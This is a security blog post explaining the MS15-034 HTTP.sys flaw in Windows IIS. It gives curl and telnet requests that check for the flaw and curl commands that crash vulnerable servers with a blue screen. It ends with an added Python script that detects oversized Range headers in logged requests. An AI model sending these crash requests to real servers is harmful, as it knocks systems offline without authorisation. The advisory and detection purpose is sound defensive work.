Remote Code Execution Via HTTP Request In IIS On Windows
Mattias Geniar, Wednesday, April 15, 2015 - last modified: Monday, April 20, 2015
A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who successfully exploited this vulnerability could execute arbitrary code in the context of the System account.
To exploit this vulnerability, an attacker would have to send a specially crafted HTTP request to the affected system. The update addresses the vulnerability by modifying how the Windows HTTP stack handles requests.
Details are withheld for now, so it's a race: patch your systems before the attackers can reverse engineer the Windows patch.
Update: exploit code is emerging
The first snippets of exploit code for MS15-034 are starting to show up; so far they only scan a system for the vulnerability.
/* Raw HTTP request used by the MS15-034 check: a Range header whose upper bound is 2^64 - 1. */
const char request1[] = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";
Detecting If You're Vulnerable
This remote scan uses the Range header to trigger a buffer overflow and detect whether the system is vulnerable or not.
$ telnet 10.0.1.1 80
GET / HTTP/1.1
Host: stuff
Range: bytes=0-18446744073709551615
The following curl command would mimic the same request.
$ curl -v 10.0.1.1/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"
You should get a response saying "HTTP Error 400. The request has an invalid header name.". Anything else as a response, and your system may still be vulnerable.
The HTTP 'Ping Of Death' Request
The vulnerability allows for a Denial of Service in the form of a blue screen. It's nearly the same request as the check command above, but the range is different:
$ curl -v 10.0.1.1/iis-85.png -H "Host: irrelevant" -H "Range: bytes=20-18446744073709551615"
$ curl -v 10.0.1.1/welcome.png -H "Host: irrelevant" -H "Range: bytes=20-18446744073709551615"
A vulnerable Windows machine would get the request, roll over and die.
The Range attack looks similar to a Denial-of-Service (DoS) attack on Apache a few years back that caused 100% CPU usage (a Dutch (NL) blog post has more details).
When sending such a request, it can trigger a blue screen on the Windows Server, effectively rendering it offline.
The CVE and the Microsoft Bulletin mention Remote Code Execution possibilities as well. Since the exact details of the patch aren't clear yet, it's unknown how to trigger that particular part of the vulnerability.
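Both the check request and the blue-screen request above share one signature: a Range header whose upper bound is far beyond anything a real client asks for. The following Python script is an added example (not code from the original post or from Microsoft) that a defender can run over captured requests from a reverse proxy or WAF to flag that pattern, and that applies the post's own response heuristic to the self-check. The 32-bit sanity bound on the range end is an assumption made here, and the sample requests and responses are constructed.

```python
"""
Detection helpers for the MS15-034 Range-header pattern (added example, not
part of the original post). Flags HTTP requests whose Range upper bound is
implausibly large, and classifies the self-check response as the post does.
"""
import re

# Assumption: no legitimate client asks for a byte offset above 2**32 - 1.
# The circulating MS15-034 requests use 18446744073709551615 (2**64 - 1).
MAX_SANE_RANGE_END = 2**32 - 1

BYTES_RE = re.compile(r"^\s*bytes\s*=\s*(.+)$", re.IGNORECASE)
SPEC_RE = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")


def parse_range_header(value):
    """Parse 'bytes=a-b,c-d' into a list of (start, end); a missing bound is None."""
    m = BYTES_RE.match(value)
    if not m:
        return []
    specs = []
    for part in m.group(1).split(","):
        sm = SPEC_RE.match(part)
        if not sm or (sm.group(1) == "" and sm.group(2) == ""):
            continue  # malformed range-spec, ignore it
        start = int(sm.group(1)) if sm.group(1) else None
        end = int(sm.group(2)) if sm.group(2) else None
        specs.append((start, end))
    return specs


def is_suspicious_range(value):
    """True when any byte range has an upper bound beyond MAX_SANE_RANGE_END."""
    return any(end is not None and end > MAX_SANE_RANGE_END
               for _, end in parse_range_header(value))


def flag_requests(raw_requests):
    """Return the request lines of raw HTTP requests carrying a suspicious Range header."""
    hits = []
    for raw in raw_requests:
        lines = raw.split("\r\n")
        request_line = lines[0]
        for header in lines[1:]:
            if not header:
                break  # blank line ends the header block
            name, _, val = header.partition(":")
            if name.strip().lower() == "range" and is_suspicious_range(val):
                hits.append(request_line)
                break
    return hits


def classify_check_response(status_code, body):
    """The post's heuristic: HTTP 400 'invalid header name' means the fix is in
    place; any other answer means the host may still be vulnerable."""
    if status_code == 400 and "invalid header name" in body.lower():
        return "patched"
    return "possibly vulnerable"


# Constructed sample requests: two with the MS15-034 Range shape, two benign.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n",
    "GET /iis-85.png HTTP/1.1\r\nHost: irrelevant\r\nRange: bytes=20-18446744073709551615\r\n\r\n",
    "GET /video.mp4 HTTP/1.1\r\nHost: example\r\nRange: bytes=0-1023\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: example\r\n\r\n",
]

if __name__ == "__main__":
    for line in flag_requests(SAMPLE_REQUESTS):
        print("suspicious Range header:", line)
    print(classify_check_response(
        400, "HTTP Error 400. The request has an invalid header name."))
```

Feeding the script the raw requests your proxy logs lets you see whether anyone is probing for the bug before the patch lands; `classify_check_response` only encodes the "400 means patched, anything else means maybe not" rule stated above, so treat "possibly vulnerable" as a prompt to patch rather than a confirmation.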